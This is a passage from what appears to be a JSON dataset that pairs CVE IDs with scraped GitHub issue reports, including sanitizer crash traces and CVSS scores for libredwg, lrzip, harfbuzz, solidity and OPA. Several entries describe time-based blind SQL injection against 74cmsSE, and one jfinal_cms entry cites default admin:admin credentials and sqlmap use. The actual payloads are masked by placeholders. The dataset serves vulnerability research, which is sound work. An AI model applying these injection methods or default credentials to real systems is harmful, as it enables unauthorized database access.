efbeac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbead0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application 
bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84392. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84393. "severity": "HIGH",
  84394. "baseScore": 7.8,
  84395. "impactScore": 5.9,
  84396. "exploitabilityScore": 1.8
  84397. },
  84398. {
  84399. "CVE_ID": "CVE-2022-33026",
  84400. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/484",
  84401. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/484",
  84402. "Repo_new": "libredwg/libredwg",
  84403. "Issue_Created_At": "2022-06-07T01:21:33Z",
  84404. "description": "heap buffer overflow exists in the function bit_calc_CRC in bits.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1 bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffca NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e0 in bit_calc_CRC PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in bit_calc_CRC Shadow bytes around the buggy address NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG a NUMBERTAG c2c7fff NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 
Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84405. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84406. "severity": "HIGH",
  84407. "baseScore": 7.8,
  84408. "impactScore": 5.9,
  84409. "exploitabilityScore": 1.8
  84410. },
  84411. {
  84412. "CVE_ID": "CVE-2022-33027",
  84413. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/490",
  84414. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/490",
  84415. "Repo_new": "libredwg/libredwg",
  84416. "Issue_Created_At": "2022-06-07T01:40:09Z",
  84417. "description": "heap use after free exists in the function dwg_add_handleref in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fffffffc7d0 sp NUMBERTAG fffffffc7c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG in dwg_add_handleref PATHTAG NUMBERTAG ea NUMBERTAG in dwg_add_BLOCK_HEADER PATHTAG NUMBERTAG baf6 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG a2 in APITAG PATHTAG NUMBERTAG d (<unknown module>) previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG c in dwg_new_ref PATHTAG SUMMARY: APITAG heap use after free PATHTAG in dwg_add_handleref Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fd fd fd fd[fd]fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable 
NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84418. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84419. "severity": "HIGH",
  84420. "baseScore": 7.8,
  84421. "impactScore": 5.9,
  84422. "exploitabilityScore": 1.8
  84423. },
  84424. {
  84425. "CVE_ID": "CVE-2022-33028",
  84426. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/489",
  84427. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/489",
  84428. "Repo_new": "libredwg/libredwg",
  84429. "Issue_Created_At": "2022-06-07T01:37:45Z",
  84430. "description": "heap buffer overflow exists in the function dwg_add_object in decode.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG ac NUMBERTAG at pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG fffffffc7c0 sp NUMBERTAG fffffffbf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG ac NUMBERTAG thread T NUMBERTAG bc NUMBERTAG in __asan_memset PATHTAG NUMBERTAG a NUMBERTAG e in dwg_add_object PATHTAG NUMBERTAG e NUMBERTAG in dwg_add_VIEW PATHTAG NUMBERTAG c NUMBERTAG e in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG e NUMBERTAG ac NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG b9ca in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memset Shadow bytes around the buggy address NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow 
byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84431. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84432. "severity": "HIGH",
  84433. "baseScore": 7.8,
  84434. "impactScore": 5.9,
  84435. "exploitabilityScore": 1.8
  84436. },
  84437. {
  84438. "CVE_ID": "CVE-2022-33032",
  84439. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/488",
  84440. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/488",
  84441. "Repo_new": "libredwg/libredwg",
  84442. "Issue_Created_At": "2022-06-07T01:34:49Z",
  84443. "description": "heap buffer overflow exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG dc bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffc9f8 WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG db in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG f0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack 
right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84444. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84445. "severity": "HIGH",
  84446. "baseScore": 7.8,
  84447. "impactScore": 5.9,
  84448. "exploitabilityScore": 1.8
  84449. },
  84450. {
  84451. "CVE_ID": "CVE-2022-33033",
  84452. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/493",
  84453. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/493",
  84454. "Repo_new": "libredwg/libredwg",
  84455. "Issue_Created_At": "2022-06-08T01:47:21Z",
  84456. "description": "double free exists in the function dwg_read_file in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG a in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG double free PATHTAG in APITAG NUMBERTAG ABORTING poc URLTAG",
  84457. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84458. "severity": "HIGH",
  84459. "baseScore": 7.8,
  84460. "impactScore": 5.9,
  84461. "exploitabilityScore": 1.8
  84462. },
  84463. {
  84464. "CVE_ID": "CVE-2022-33034",
  84465. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/494",
  84466. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/494",
  84467. "Repo_new": "libredwg/libredwg",
  84468. "Issue_Created_At": "2022-06-08T01:51:23Z",
  84469. "description": "stack buffer overflow exists in the function copy_bytes in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffc8f0 at pc NUMBERTAG bb bp NUMBERTAG fffffffbc NUMBERTAG sp NUMBERTAG fffffffbc NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffc8f0 thread T NUMBERTAG ba in copy_bytes PATHTAG NUMBERTAG ba in decompress_r NUMBERTAG PATHTAG NUMBERTAG in read_file_header PATHTAG NUMBERTAG in read_r NUMBERTAG meta_data PATHTAG NUMBERTAG in decode_R NUMBERTAG PATHTAG NUMBERTAG in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG ) Address NUMBERTAG fffffffc8f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in read_r NUMBERTAG meta_data PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG str.i NUMBERTAG sec_dat.i NUMBERTAG str_dat.i NUMBERTAG ptr.i NUMBERTAG data.i NUMBERTAG file_header' APITAG NUMBERTAG fff NUMBERTAG f3]f NUMBERTAG fff NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac 
Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84470. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84471. "severity": "HIGH",
  84472. "baseScore": 7.8,
  84473. "impactScore": 5.9,
  84474. "exploitabilityScore": 1.8
  84475. },
  84476. {
  84477. "CVE_ID": "CVE-2022-33067",
  84478. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/224",
  84479. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/224",
  84480. "Repo_new": "ckolivas/lrzip",
  84481. "Issue_Created_At": "2022-05-04T08:48:54Z",
  84482. "description": "APITAG invalid shifts. Describe the bug APITAG two runtime errors that expose invalid integer shifts in the library. To Reproduce Built lrzip using clang NUMBERTAG with CXXFLAGS and/or CFLAGS ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases: FILETAG",
  84483. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84484. "severity": "MEDIUM",
  84485. "baseScore": 5.5,
  84486. "impactScore": 3.6,
  84487. "exploitabilityScore": 1.8
  84488. },
  84489. {
  84490. "CVE_ID": "CVE-2022-33068",
  84491. "Issue_Url_old": "https://github.com/harfbuzz/harfbuzz/issues/3557",
  84492. "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/3557",
  84493. "Repo_new": "harfbuzz/harfbuzz",
  84494. "Issue_Created_At": "2022-04-29T15:03:57Z",
  84495. "description": "APITAG signed integer overflow. Describe the bug APITAG signed integer overflow in hb ot shape fallback.cc To Reproduce Built harfbuzz shape fuzzer using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcase: FILETAG",
  84496. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84497. "severity": "MEDIUM",
  84498. "baseScore": 5.5,
  84499. "impactScore": 3.6,
  84500. "exploitabilityScore": 1.8
  84501. },
  84502. {
  84503. "CVE_ID": "CVE-2022-33069",
  84504. "Issue_Url_old": "https://github.com/ethereum/solidity/issues/12973",
  84505. "Issue_Url_new": "https://github.com/ethereum/solidity/issues/12973",
  84506. "Repo_new": "ethereum/solidity",
  84507. "Issue_Created_At": "2022-04-29T16:12:49Z",
  84508. "description": "ERRORTAG Solidity assertion failed in in APITAG Describe the bug The attached testcase crashes the solidity compiler solc with an ERRORTAG Solidity assertion failed in in APITAG URLTAG To Reproduce Built solc_ossfuzz using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG Crash Output ERRORTAG zipped testcase to reproduce: FILETAG",
  84509. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84510. "severity": "MEDIUM",
  84511. "baseScore": 5.5,
  84512. "impactScore": 3.6,
  84513. "exploitabilityScore": 1.8
  84514. },
  84515. {
  84516. "CVE_ID": "CVE-2022-33082",
  84517. "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4762",
  84518. "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4762",
  84519. "Repo_new": "open-policy-agent/opa",
  84520. "Issue_Created_At": "2022-06-09T13:10:19Z",
  84521. "description": "Shadowing of called functions in comprehension heads can cause compiler panic. If a local var in a comprehension body overrides a function call in the comprehension head, it will never be possible to make that call. ERRORTAG Will cause an eval time error: ERRORTAG A compile time error should be introduced for capturing this case. A special case exists that will cause a compiler panic: ERRORTAG APITAG => ERRORTAG",
  84522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84523. "severity": "HIGH",
  84524. "baseScore": 7.5,
  84525. "impactScore": 3.6,
  84526. "exploitabilityScore": 3.9
  84527. },
  84528. {
  84529. "CVE_ID": "CVE-2022-33082",
  84530. "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4761",
  84531. "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4761",
  84532. "Repo_new": "open-policy-agent/opa",
  84533. "Issue_Created_At": "2022-06-09T12:47:04Z",
  84534. "description": "opa eval panics when using APITAG . ERRORTAG",
  84535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84536. "severity": "HIGH",
  84537. "baseScore": 7.5,
  84538. "impactScore": 3.6,
  84539. "exploitabilityScore": 3.9
  84540. },
  84541. {
  84542. "CVE_ID": "CVE-2022-33092",
  84543. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/6",
  84544. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/6",
  84545. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84546. "Issue_Created_At": "2022-06-09T09:41:10Z",
  84547. "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84548. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84549. "severity": "HIGH",
  84550. "baseScore": 7.5,
  84551. "impactScore": 3.6,
  84552. "exploitabilityScore": 3.9
  84553. },
  84554. {
  84555. "CVE_ID": "CVE-2022-33094",
  84556. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/4",
  84557. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/4",
  84558. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84559. "Issue_Created_At": "2022-06-09T07:48:06Z",
  84560. "description": "SQL Injection vulnerability . Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above it is possible to delay the function being executed twice out of NUMBERTAG Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly double the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84561. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84562. "severity": "HIGH",
  84563. "baseScore": 7.5,
  84564. "impactScore": 3.6,
  84565. "exploitabilityScore": 3.9
  84566. },
  84567. {
  84568. "CVE_ID": "CVE-2022-33097",
  84569. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/7",
  84570. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/7",
  84571. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84572. "Issue_Created_At": "2022-06-09T09:41:16Z",
  84573. "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG / In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is telojob_se , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84574. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84575. "severity": "HIGH",
  84576. "baseScore": 7.5,
  84577. "impactScore": 3.6,
  84578. "exploitabilityScore": 3.9
  84579. },
  84580. {
  84581. "CVE_ID": "CVE-2022-33114",
  84582. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/38",
  84583. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/38",
  84584. "Repo_new": "jflyfox/jfinal_cms",
  84585. "Issue_Created_At": "2022-06-10T02:49:09Z",
  84586. "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG The vulnerability appears in lines NUMBERTAG of the APITAG APITAG APITAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG Administrator login is required. The default account password is admin:admin NUMBERTAG APITAG Injection parameters: APITAG payload\uff1a CODETAG APITAG Sqlmap: APITAG",
  84587. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  84588. "severity": "HIGH",
  84589. "baseScore": 7.2,
  84590. "impactScore": 5.9,
  84591. "exploitabilityScore": 1.2
  84592. },
  84593. {
  84594. "CVE_ID": "CVE-2022-33121",
  84595. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/45",
  84596. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/45",
  84597. "Repo_new": "bg5sbk/minicms",
  84598. "Issue_Created_At": "2022-06-11T12:37:22Z",
